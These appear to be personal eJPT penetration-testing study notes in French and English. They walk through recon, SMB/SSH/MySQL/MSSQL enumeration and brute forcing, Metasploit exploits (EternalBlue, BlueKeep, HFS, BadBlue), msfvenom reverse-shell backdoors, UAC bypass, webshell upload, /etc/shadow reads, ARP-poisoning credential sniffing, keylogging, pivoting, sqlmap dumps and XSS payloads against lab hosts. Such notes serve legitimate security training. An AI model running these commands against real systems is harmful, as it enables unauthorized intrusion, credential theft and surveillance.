# EJPT ## Assessment Methodologies ### Information Gathering La reconnaissance est la première phase dans les pentest. Il y a deux types de reconnaissance, passive et active. ### reconnaissance passive ```bash host example.com ``` Vérifier le robots.txt On peut utiliser des plugins comme wappanalyse ou builtwith pour savoir avec quoi le site est construit. On peut aussi utiliser la commande whatweb ```bash whatweb example.com ``` On peut aussi copier entièrment le site: ```bash apt install webhttrack ``` Ensuite aller dans son menu démarrer et lancer l'application. #### whois enumeration ```bash whois exemple.com ``` Enumeration netcratf.com #### DNS Recon ```bash dnsrecon -d exemple.com ``` Le site dnsdumpster.com est très utile. l'outil wafw00f ```bash wafw00f exemple.com ``` ##### Enumeration de sous domaines ```bash apt install sublist3r sublist3er -d exemple.com ``` On peut spécifier les moteurs de recherches utilisés ```bash sublist3er -d exemple.com -e yahoo,google,dnsdumpster,netcraft ``` ##### Google dorks site:exemple.com site:*.ine.com (va nous montrer tous les sous-domaines) inurl:admin (forum, etc..) intitle:admin (index of,etc...) filetype:pdf (xlxs,doc,docx) cache:exemple.com une très bonne référence est le site exploit db et sa section hacking google database. https://www.exploit-db.com/google-hacking-database #### Email Harvesting ```bash theHarvester -d exemple.com -b google,linkedin ``` Une fois que l'on a récupérer des adresses mails, on peut vérifier si il y a déjà eu une fuite de mdp. ihavebeenpwned est un site intéressant pour ça. ### Reconnaissance active #### DNS Zone transfert dsnenum fait automatiquement le transfert de zone ```bash dnsenum zonetranfer.me ``` On peut aussi le faire avec dig. On trouve les serveurs dns, on fait le transfert de zone avec dig ```bash dig axfr @dns1.ovh zonetranfer.me ``` brute force sur la zone dns: ``` fierce -dns exemple.com ``` #### Port scanning Sur les machines windows il est conseillé d'utiliser le flag -Pn (pas de ping, car elles bloquent l'icmp) ```bash nmap -v -Pn @IP ``` ### Assessment Methodologies: Footprinting & Scanning 1. Physical Access 2. Physical Security 3. OSINT 4. Social Engineering 3. Sniffing 4. Passive Reconnaissance 5. Watch network traffic 5. ARP 6. Resolve IP to MA (ARP Table) 7. ICMP 8. Traceroute 9. Ping #### Wireshark #### ARP-SCAN ```bash! arp-scan -I eth0 -g @ip/24 ``` #### Fping Pour "pinguer" un réseau ```bash fping -I eth0 @ip/24 -a 2>/dev/null ``` nmap $TG -p134,177,234 -sUV --- ### Assessment Methodologies: Enumeration 1. Servers and Services 2. SMB 3. FTP 4. SSH 5. HTTP 6. SQL #### SMB nmap TG On voit le port 445 avec microsoft-ds (c'est smb) ```bash nmap -p445 --scritp smb-protocols $TG ``` Trouver les 25 ports udp les plus courramment utilisés ```bash nmap -sU --top-ports 25 $TG ``` ```bash nmap -p445 --scritp smb-os-discovery $TG ``` Nous voyons que la version utilisée la v1 (obsolète). Nous allons utilisé un script avec nmap pour l'exploiter. ```bash nmap -p445 --script smb-security-mode $TG ``` il y a aussi un script pour énumérer les sessions en passant des arguments: ```bash nmap -p445 --script smb-enum-sessions --script-args smbusername=administrator,sbmpassword=smbserver_771 $TG ``` On peut lister les partages: ```bash= nmap -p445 --script smb-enum-shares $TG ``` On peut s'authentifier et faire l'enumération: ```bash= nmap -p445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=smbserver_771 $TG ``` On peut aussi lister les utilisateurs en s'authentifiant: ```bash= nmap -p445 --script smb-enum-users --script-args smbusername=administrator,sbmpassword=smbserver_771 $TG ``` On peut aussi avoir des informations stat (logs) du serveur. ```bash= nmap -p445 --script smb-server-stats --script-args smbusername=administrator,sbmpassword=smbserver_771 $TG ``` On peut lister les groupes ```bash nmap -p445 --script smb-enum-groups --script-args smbusername=administrator,sbmpassword=smbserver_771 $TG ``` On peut lister les services: ```bash nmap -p445 --script smb-enum-services --script-args smbusername=administrator,sbmpassword=smbserver_771 $TG ``` On peut lister le contenu des repertoires ```bash nmap -p445 --script smb-enum-shares,smb-ls --script-args smbusername=administrator,sbmpassword=smbserver_771 $TG ``` #### SMBMAP Se connecter avec l'utilisateur "guest" ```bash smbmap -u gest -p "" -d . -H $TG ``` Se connecter avec utilisateur mot de passe: ```bash smbmap -u administrator -p "smbserver_771" -d . -H $TG ``` On peut lancer une commande: ```bash smbmap -H $TG -u administrator -p "smbserver_771" -x 'ipconfig' ``` On peut lister un repertoire: ```bash smbmap -u administrator -p "smbserver_771" -L ``` On peut mapper un repertoire: ```bash smbmap -H $TG -u administrator -p "smbserver_771" -r 'C$' ``` On peut uploader un fichier: ```bash smbmap -u administrator -p "smbserver_771" --upload '/root/mon_fichier' 'C$\mon_fichier' ``` On peut télécharger un peut télécharger un fichier: ```bash smbmap -u administrator -p "smbserver_771" --download 'C$\mon_fichier' ``` #### SAMBA #### SMB avec metasploit ```bash use auxiliary/scanner/smb/smb_version ``` ##### nmblookup ```bash nmblookup -A $TG ``` ##### SMBCLIENT ```bash smblclient -L $TG -N ``` Se connecter à un partage: ```bash smbclient //$TG/nom_partage -N (pour No password) ``` ##### RPCCLIENT ```bash rpcclient -U "" -N $TG ``` on peut faire un 'enumdomusers' pour lister les utilisateurs, aussi lookupnames nom_user srvinfo ##### enum4linux ```bash enum4linux -o $TG ``` Lister les utilisateurs: ```bash enum4linux -U $TG ``` Avoir les SID ```bash enum4linux -r -u "admin" -p "password1" ``` Enumérer les comptes utilisateurs ```bash! enum4linux -u "admin" -p "password1" -U $TG ``` Lister les partages: ```bash enum4linux -S $TG ``` Lister les imprimantes: ```bash enum4linux -i $TG ``` #### SMB dictionary attack On démarre msf ```bash= use auxiliary/scanner/smb/smb_login set rhosts set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt set smbuser jane run ``` Avoir une liste de pipe que l'on pourra exploiter plus tard ```bash= use auxiliary/scanner/smb/pipe_auditor set smbuser admin set smbpass password1 set rhosts run ``` ##### hydra ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt $TG smb ``` #### FTP ##### hydra ```bash hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $TG ftp ``` ##### nmap ```bash nmap $TG --script ftp-brute --script-args userdb=/pathto/wordlists.txt -p 21 ``` #### ftp anonymous login ```basj nmap $TG -p 21 --script ftp-anon ``` #### SSH lister les aglos de chiffrement possibles: ```bash nmap $TG -p 22 --script ssh2-enum-algos ``` Récupérer les hostkey: ```bash nmap $TG -p 22 --script ssh-hostkey --script-args ssh_hostkey=full ``` Voir les méthod d'authentifications pour un utilisateur: ```bash nmap $TG -p 22 --script ssh-auth-methods --script-args="ssh.user=student" ``` Lancer une commande avec nmap à travers ssh: ```bash nmap -p 22 --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=student,ssh-run.password=" $TG ``` ssh par bruteforce ```bash hydra -l admin -P /usr/share/wordlists/rockyou.txt $TG ssh hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.26.161 ssh ``` ```bash nmap -p 22 --script ssh-brute --script-args userdb=/pathto/myuserlist $TG ``` Brute force avec MSF ```bash= use auxiliary/scanner/ssh/ssh_login set rhosts set userpass_file /usr/share/wordlists/metasploit/root_userpass.txt set stop_on_success true set verbose true run ``` #### HTTP ```bash= browsh --startup-url http://$TG ``` ```bash! nmap -sV -p 80 --script http-enum $TG ``` ```bash! nmap -sV -p 80 --script http-methods --script-args http-methods.url-path=/webdav $TG ``` ```bash! nmap -sV -p 80 --script http-webdav-scan --script-args http-methods.url-path=/webdav $TG ``` ```bash! nmap -p 80 -sv --script banner $TG ``` Avec msf ```bash= use auxiliary/scanner/http/http_version set rhosts run ``` ```bash= curl $TG | more ``` ```bash= wget $TG ``` ```bash= browsh --startup-url $TG ``` ```bash= lynx http://$TG ``` Avec msf lister les repertoires ```ruby= use auxiliary/scanner/http/http_brute_dirs set rhosts exploit ``` Utiliser le robots.txt ```bash= use auxiliary/scanner/http/robots_txt set rhosts run ``` ### MySQL Une fois dans la base de donnée ```sql= show databases; use bookbdd; show tables; select count(*) from authors; select * from authors; ``` Avec MSF ```ruby= use auxiliary/scanner/mysql/mysql_writable_dirs set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt set rhosts advanced (pour voir les options avancées si besoin) set password "" (pour nopassword) run ``` 1. ```ruby= use auxiliary/scanner/mysql/mysql_hasdump set unsername set password set rhosts exploit ``` 2. ```sql mysql -h $TG -u root -p select load_file("/etc/shadow") ``` Récupérer les comptes qui n'ont pas de mot de passe. ```bash! nmap -p 3306 -sV --script=mysql-empty-password $TG ``` ```bash! nmap -p 3306 -sV --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" $TG ``` ```bash! nmap -p 3306 -sV --script=mysql-audit --script-args="mysql-audit.username='root',mysqsl-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" $TG ``` Brute force du login avec msf ```bash= use auxiliary/scanner/mysql_login set rhosts set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set stop_on_success true set username root run ``` Brute force avec Hydra ```bash! hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $TG mysql ``` ### Microsoft SQL ```bash! nmap -p 1433 -v --script ms-sql-info $TG ``` ```bash! nmap -p 1433 --script -ntlm-info --script-args mssql.instance-port=1433 $TG ``` Brute force mssql ```bash! nmap -p 1433 -v --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt $TG ``` Requête avec nmap Récupérer les comptes sys ```bash! nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" $TG -oN output.txt ``` Récupérer compte sans mot de passe ```bash! nmap -p 1433 -v --script ms-sql-empty-password $TG ``` Récupérer les hash des mdp ```bash! nmap -p 1433 -v --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria $TG ``` ```bash! nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" $TG ``` ##### msf console ```ruby= use auxiliary/scanner/mssql/mssql_login set rhosts set user set user_file /root/Desktop/wordlist/common_users.txt set pass_file /root/Desktop/wordlist/100-common-passwords.txt run ``` ```ruby= use auxiliary/admin/mssql/mssql_enum auxiliary/admin/mssql/mssql_shemadump set rhosts set user_file set pass_file run ``` Extract all MSSQL users ```ruby= use auxiliary/scanner/mssql/mssql_enum_sql_logins set rhosts set user_file set pass_file run ``` Pour executer des commandes: ```ruby= use auxiliary/admin/mssql/mssql_exec set rhosts set rport set username set cmd whoami run ``` ```ruby= use auxiliary/scanner/mssql/mssql_enum_domain_accounts set rhosts set rport set username set cmd whoami run ``` ### Vulnerability assessements --- ## Host & Networking Auditing --- ## Host & Network Penetration Testing --- ### System/Host Based Attacks #### Exploiting Windows Vulnerabilities ##### webdav IIS ```bash= nmap -sV -P 80 --script=http-enum $TG ``` Brute force sur webdav: ```bash= hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt $TG http-get /webdav/ ``` ##### davtest ```bash= davtest -auth bob:password_123321 -url http://$TG/webdav ``` ##### cadaver ```bash= cadaver http://$TG Username:bob Password: put /usr/share/webshells/asp ``` On retourne sur le serveur: http:$TG/webdav/webshell.asp les webshells sont disponibles par défaut sur kali dans /usr/share/webshells/asp/webshell.asp on choisit celui que l'on veut et on peut l'uploader sur notre webdav. ##### Exploiting WebDAV with Metasploit Générer un paylod avec msfvenom ```bash= msfvenom -p windows/meterpreter/reverse_tcp LHOST=$TG LPORT=1234 -f asp > shell.asp ``` Ensuite sur msf ```ruby= use multi/handler set payload windows/meterpreter/reverse_tcp set LHOST set LPORT ``` We can use a default payload in msf: ```ruby= search iis upload use windows/iis_webdav_upload_asp set lhost set lport set rhost set rport set path /webdav/metasploit%RAND%.asp set httppasword set httpusername run shell ``` ##### Exploiting SMB with PsExec SMB use ports 445 and 139, and two levels of authentication (user authentication and share authentication) In UA authentication, on fournit user et mdp, dans le cas du SA on fournit juste un mdp. ##### SMB bruteforce MSF ```ruby= search smb_login use auxiliary/scanner/smb/smb_login set rhost set/ rport set smbdomain set smbpass (or pass_file) /usr/share/metasploit-framework/data/wordlists/common_users.txt set smbuser (or user_file) /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set verbose false ``` ```bash psexec.py Administrator@$TG cmd.exe Password: ``` On peut utiliser un autre module pour lancer directement un payload ```ruby= use exploit/windows/smb/psexec set rhosts set rport set lhost set lport set smbuser Administrator set smbpass qwertyuiop run ``` Manuellement: ```bash! cp /usr/share/doc/python3-impacket/examples/psexec.py /root/Desktop chmod +x psexec.py python3 psexec.py Administrator@demo.ine.local ``` ##### Exploiting Windows MS17-010 SMB (EternalBlue) ```bash= nmap -sV -p 445 --script=smb-vuln-ms17-010 $TG -O -v ``` ##### Exploit manuel avec AutoBlue 1. Aller sur le github aublue-ms17010 et le cloner 1. Installer les prerequis ```bash= pip -r requirements.txt cd shellcode chmod +x shell_prep.sh ./shell_prep.sh cd ../ ./eternalbule_exploit10.py $TG shellcode/sc_x64.bin(le chiffre dépend de la version de windows) en parallèle il faut un socket ouvert sur le port spécifier (Avec NC par exemple). ``` ##### Exploiting RDP Scan rdp avec msf ```ruby= search rdp_scanner use auxiliary/scanner/rdp/rdp_scanner set rhosts set rport run ``` ##### Bruteforce RDP avec Hydra ```bash= hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frameork/data/wordlists/unix_passwords.txt rdp://$TG -s 3389 se connecter en rdp xfreerdp /u:administrator /p:qwertyuiop /v:$TG:3389 ``` ##### BlueKepp vulnerabilite RDP Il faut faire attention, il y a beaucoup d'exploits sur cette vuln qui ne sont pas officiels et ne font pas ce qui est attendu. Il vaut mieux utiliser un exploit "reconnu" comme sur msf. De plus cette vulnérabilité travail sur le kernel et peut faire crasher la machine assez facilement. ```ruby= search bluekeep use auxiliary/scanner/rdp/cve_2019_0708_bluekeep ou use exploit/windows/rdp/cve_2019_0708_bluekeep_rce (il fera aussi le scann que l'on retrouve dans auxiliary ) set rport set lhost set lport run si ne fonctionne pas show targets choisir la version de windows exmemple: set target 2 run ``` ##### Exploiting WinRM WinRM typicallys uses TCP port 5985 and 5986 (HTTPS) ##### Bruteforce avec crackmapexec ```ruby= crackmapexec crackmapexec winrm $TG -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt #On peut lancer des commandes: crackmapexec winrm $TG -u administrator -p mot_de_passe_trouvé -x "systeminfo" ``` ##### Obtenir un shell avec evil-winrm ```ruby= evil-winrm.rb -u adminustrator -p 'motdepasse' -i $TG ``` ##### Obtenir un shell avec MSF ```ruby! search winrm_script use exploit/windows/winrm/winrm_script_exec set rhosts set rport set lhost set lport set force_vbs true set username set password run ``` --- #### Windows Privilege Escalation ##### Windows Kernel Exploits ##### Bypassing UAC With UACMe ```bash nmap -sV -p 80 10.0.27.103 ```  ```bash searchsploit hfs ``` Rejetto HTTP File Server (HFS) 2.3 is vulnerable to RCE. Exploiting the target server using the Metasploit framework. ```bash msfconsole -q ``` ```ruby use exploit/windows/http/rejetto_hfs_exec set RHOSTS 10.0.27.103 exploit ```  Checking the current user: ```bash getuid sysinfo ```  We can observe that we are running as an admin user. Migrate the process in explorer.exe. First, search for the PID of explorer.exe and use the migrate command to migrate the current process to the explorer process. ```bash ps -S explorer.exe ``` Elevate to the high privilege: ```bash getsystem ```  We can observe that we do not have permission to elevate privileges. Get a windows shell and check if the admin user is a member of the Administrators group. ```ruby shell net localgroup administrators ```  The admin user is a member of the Administrators group. However, we do not have the high privilege as of now. We can gain high privilege by Bypassing UAC (User Account Control) We are going to bypass the UAC for admin user with the help of UACMe tool. Generating malicious executable using msfvenom and running it on the target machine to gain administrator user privileges: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe' ``` Switch the directory to the user’s temp folder and upload the Akagi64.exe and backdoor.exe executable. ```bash CTRL + C cd C:\\Users\\admin\\AppData\\Local\\Temp upload /root/Desktop/tools/UACME/Akagi64.exe . upload /root/backdoor.exe ls ```  Start another msfconsole and run a multi handler. ```bash! msfconsole -q use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.10.1.3 set LPORT 4444 exploit ```  Switch back to the meterpreter and run the Akagi64.exe executable. Note: Please provide the full path of the backdoor executable Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe We are going to use UACMe method number 23: Author: Leo Davidson derivative Type: Dll Hijack Method: IFileOperation Target(s): \system32\pkgmgr.exe Component(s): DismCore.dll Implementation: ucmDismMethod Once we execute the above command we would expect a meterpreter session. ##### Access Token Impersonation #### Windows File System Vulnerabilities ##### Alternate Data Streams #### Windows Credential Dumping --- #### Exploiting Linux Vulnerabilities #### Linux Privilege Escalation #### Linux Credential Dumping --- ### Network-Based Attacks #### ARP Poisoning Identify the IP address of the Kali Instance.  Perform a nmap scan on the whole network  The first machine is the gateway machine and is not to be attacked. The second machine corresponds to the telnet server (port 23 is open), the third is the client machine, and the fourth is the Kali instance. Configure the Kali instance to forward IP packets: ```bash echo 1 > /proc/sys/net/ipv4/ip_forward ``` Perform the ARP poisoning attack ```bash arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36 ```  Navigate to the "Sniffing & Spoofing" menu and start Wireshark  Select the eth1 interface.  The traffic from eth1 interface will appear on Wireshark.  Apply "telnet" filter to view the telnet traffic.  Follow the TCP stream. Right-click on a packet and click on TCP stream from Follow section.  The telnet login credentials are mentioned in the TCP stream  Log in to the telnet server using the stolen credentials.  Successfully logged in to the telnet server. And that's how ARP poisoning can be performed to sniff sensitive information from the network. #### WiFi Security: Traffic Analysis I What is the name of the Open (No Security) SSID present in the packet dump? ```bash= Filter: (wlan.fc.type_subtype == 0x0008) && (!(wlan.wfa.ie.wpa.version == 1)) && !(wlan.tag.number == 48) ```  The SSID 'Home_Network' is operating on which channel? ```bash= Filter: wlan contains Home_Network ```  Which security mechanism is configured for SSID 'LazyArtists'? ```bash= Filter: wlan contains LazyArtists ```  Is WiFi Protected Setup (WPS) enabled on SSID 'Amazon Wood'? ```bash= Filter: (wlan.ssid contains "Amazon") && (wlan.fc.type_subtype == 0x0008) ```  What is the total count of packets which were either transmitted or received by the device with MAC e8:de:27:16:87:18? ```bash! Filter: (wlan.ta == e8:de:27:16:87:18) || (wlan.ra == e8:de:27:16:87:18) ```  What is the MAC address of the station which exchanged data packets with SSID 'SecurityTube_Open'? ```bash! Filter: ((wlan.bssid == e8:de:27:16:87:18) ) && (wlan.fc.type_subtype == 0x0020) ```  From the last question, we know that a station was connected to SSID 'SecurityTube_Open'. Provide TSF timestamp of the association response sent from the access point to this station. ```bash! Filter: (((wlan.bssid == e8:de:27:16:87:18)) && (wlan.addr==5c:51:88:31:a0:3b)) && (wlan.fc.type_subtype == 0x0001) ```  #### Filtering Advanced: WiFi Tshark What command can be used to show only WiFi traffic? ```bash! tshark -r WiFi_traffic.pcap -Y "wlan" ``` What command can be used only view the deauthentication packets? ```bash tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" ``` What command can be used to only display WPA handshake packets? ```bash tshark -r WiFi_traffic.pcap -Y "eapol" ``` What command can be used to only print the SSID and BSSID values for all beacon frames? ```bash tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid ``` What is BSSID of SSID “LazyArtists”? ```bash tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid ``` SSID "Home_Network" is operating on which channel? ```bash tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel ``` Which two devices received the deauth messages? State the MAC addresses of both ```bash tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra ``` Which device does MAC 5c:51:88:31:a0:3b belongs to? Mention manufacturer and model number of the device. ```bash tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent ``` --- ### The Metasploit Framework (MSF) --- ### Exploitation #### Exploits #### Shells ##### Windows: file and keylogging We have discovered that multiple ports are open. We will run nmap again to determine version information on port 80. ```bash nmap -sV -p 80 10.0.0.71 ``` We will search the exploit module for badblue 2.7 using searchsploit. ```bash! searchsploit badblue 2.7 ```  There is a metasploit module for badblue server. We will use PassThu remote buffer overflow metasploit module to exploit the target. ```ruby! msfconsole use exploit/windows/http/badblue_passthru set RHOSTS 10.0.0.71 exploit ```  Searching the flag. ```ruby! shell cd / ```  Switch the directory to the Administrator’s Desktop and create a text file. i.e hacked.txt ```bash! cd Users\\Administrator\\Desktop dir ECHO “You have been Hacked” > hacked.txt ``` Verifying the created file on the victim machine. Running a hacked.txt file from the attacker’s machine. Just enter the name of the file “hacked.txt” and press enter   Checking all the running processes on the target machine and migrating the current process in explorer.exe process. ```bash! ps ```  ```bash! migrate 2724 ```  We have successfully migrated into the explorer.exe process. Running keyscan_start to capture keystrokes. ```bash! keyscan_start ```  Typing random texts in the notepad.  Dump the keylogger data. ```bash! keyscan_dump ```  #### Frameworks ##### Workflow platform ```bash nmap --top-ports 65536 10.0.0.168 ``` We have discovered that multiple ports are open. Access port 80 using firefox browser. ```bash firefox 10.0.0.168 ```  Target is running a ProcessMaker application. Login to the ProcessMaker application using default admin:admin credentials.  Go to admin → Settings → System Information to identify the version of the ProcessMaker application.  The ProcessMaker version is 2.5.0. Search “processmaker 2.5.0 exploit” on google to find the vulnerability. Open Exploit-DB link: https://www.exploit-db.com/exploits/29325 The target application is vulnerable to PHP Code Execution. We will use the metasploit framework to exploit the vulnerability. ```ruby msfconsole search processmaker ```  ```bash use exploit/multi/http/processmaker_exec set RHOSTS 10.0.0.168 exploit ```  We have successfully exploited the target ProcessMaker application and received a meterpreter shell. Searching the flag. ```bash pwd cd / dir cat flag.txt ``` --- ### Post Exploitation #### Windows local enumeration when you are on the tartget: ```bash sysinfo shell hostname systeminfo wmic qfe get Caption,Description,HotFixID,InstalledOn ``` list of installed updates on the system ```bash wmic qfe get Caption,Description,HotFixID,InstalledOn ``` #### Pivoting Lesson Checking target IP address  ```bash! nmap 10.0.23.180 ```  ```bash! nmap -sV -p 80 10.0.23.180 ```  ```bash searchsploit hfs ```  ```ruby! msfconsole -q use exploit/windows/http/rejetto_hfs_exec set RHOSTS 10.0.23.180 exploit ```  We have successfully exploited the target vulnerable application (hfs) and received a meterpreter shell. Check target machine IP Address.  We can observe, there is only one network adapter and we have two machine IP addresses. But, we cannot access “Victim Machine 2” directly from the attacker’s machine. We will add a route and then we will run an auxiliary port scanner module on the second victim machine to discover a host and open ports. ```ruby! run autoroute -s 10.0.23.0/20 ``` pour supprimer une route ```ruby! run autoroute -d -s 10.2.31.0/24 ```  Running the port scanner on the second machine. ```ruby! background use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.27.99 set PORTS 1-100 exploit ```  We have discovered port 80 on the pivot machine. Now, we will forward the remote port 80 to local port 1234 and grab the banner using Nmap ```ruby! sessions -i 1 portfwd add -l 1234 -p 80 -r 10.0.27.99 portfwd list ```  We have forwarded the port, now use Nmap to find the running application name and version. **Note**: Do not close msfconsole. ```bash nmap -sV -sS -p 1234 localhost ```  ```bash searchsploit badblue 2.7 ```  ```ruby use exploit/windows/http/badblue_passthru set PAYLOAD windows/meterpreter/bind_tcp set RHOSTS 10.0.27.99 exploit ```  ```ruby Command: shell cd / dir type flag.txt ``` --- ### Social Engineering --- ## Web Application Penetration Testing ### Scan avec Nikto ```bash nikto -h http://$TG/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm ``` ### Injection SQL #### SQLMAP et Burpsuite Récupérer le cookie de session à l'aide de burpsuite, il est indispensable pour sqlmap ```bash sqlmap -u "http://192.210.141.3/sqli_1.php?title=hello&action=search" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title ``` Lister les BDD ```bash sqlmap -u "http://192.210.141.3/sqli_1.php?title=hello&action=search" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title --dbs ``` Lister les tables ```bash sqlmap -u "http://192.210.141.3/sqli_1.php?title=hello&action=search" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP --tables ``` Avoir les colones de la tables ```bash sqlmap -u "http://192.210.141.3/sqli_1.php?title=hello&action=search" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP -T users --columns ``` Use the sqlmap to dump password and email for admin from the users table. Press ‘n’ twice when prompted ```bash sqlmap -u "http://192.210.141.3/sqli_1.php?title=hello&action=search" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump ``` ### Attaque XSS #### xsser ##### XSS Attack with XSSer URL:http://192.94.37.3/index.php?page=dns-lookup.php Intercepter avec Burpsuite Pass the URL to XSSER. Replace “HelloWorld” with “XSS”, this is done so that XSSer will substitute payload in place of "XSS" string. ```bash! xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' ``` The output confirms that the target is vulnerable. ##### Trying various XSS payloads by using XSSer's “--auto” option ```bash xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto ``` ##### Using custom XSS payload. ```bash xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>" ``` In Burp Suite, replace the POST parameters with the final attack payload and forward the request ##### Performing XSS attack over GET request. Navigate to the Poll Question webpage URL:http://192.94.37.3/index.php?page=user-poll.php Enter any value and submit the vote. Copy the URL, replace the nmap value with "XSS" and pass it to XSSer URL:http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=jd&user-p oll-php-submit-button=Submit+Vote ```bash xsser --url “http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-po ll-php-submit-button=Submit+Vote” ``` Providing basic XSS payload to XSSer ```bash xsser --url "http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-po ll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>" ``` Open the final attack link to trigger the XSS vulnerability in firefox browser. ```bash http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281 %29%3C%2Fscript%3E&initials=jd&user-poll-php-submit-button=Submit+Vote ``` ##### Authenticated XSS Attack with XSSer ### Attacking HTTP Login Form #### Attack with Hydra 1. Enter some random username and password 2. Since the username / password combination is wrong, the following message gets displayed: invalid credentials or user not activated! 3. Inspect the page source (Press CTRL + U) and view the form: Notice the parameters passed in the form. The form data is submitted to /login.php. In the form, there are 2 input fields: name, password. The security_level is set to low (0). 4. Using hydra to crack the credentials. ```bash hydra -L usernames -P passwords 192.208.137.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!" ``` ^USER^ placeholder will take in the username from the list ^PASS^ placeholder will take in the password from the list ### Attacking Basic Auth #### Attack with Burp Suite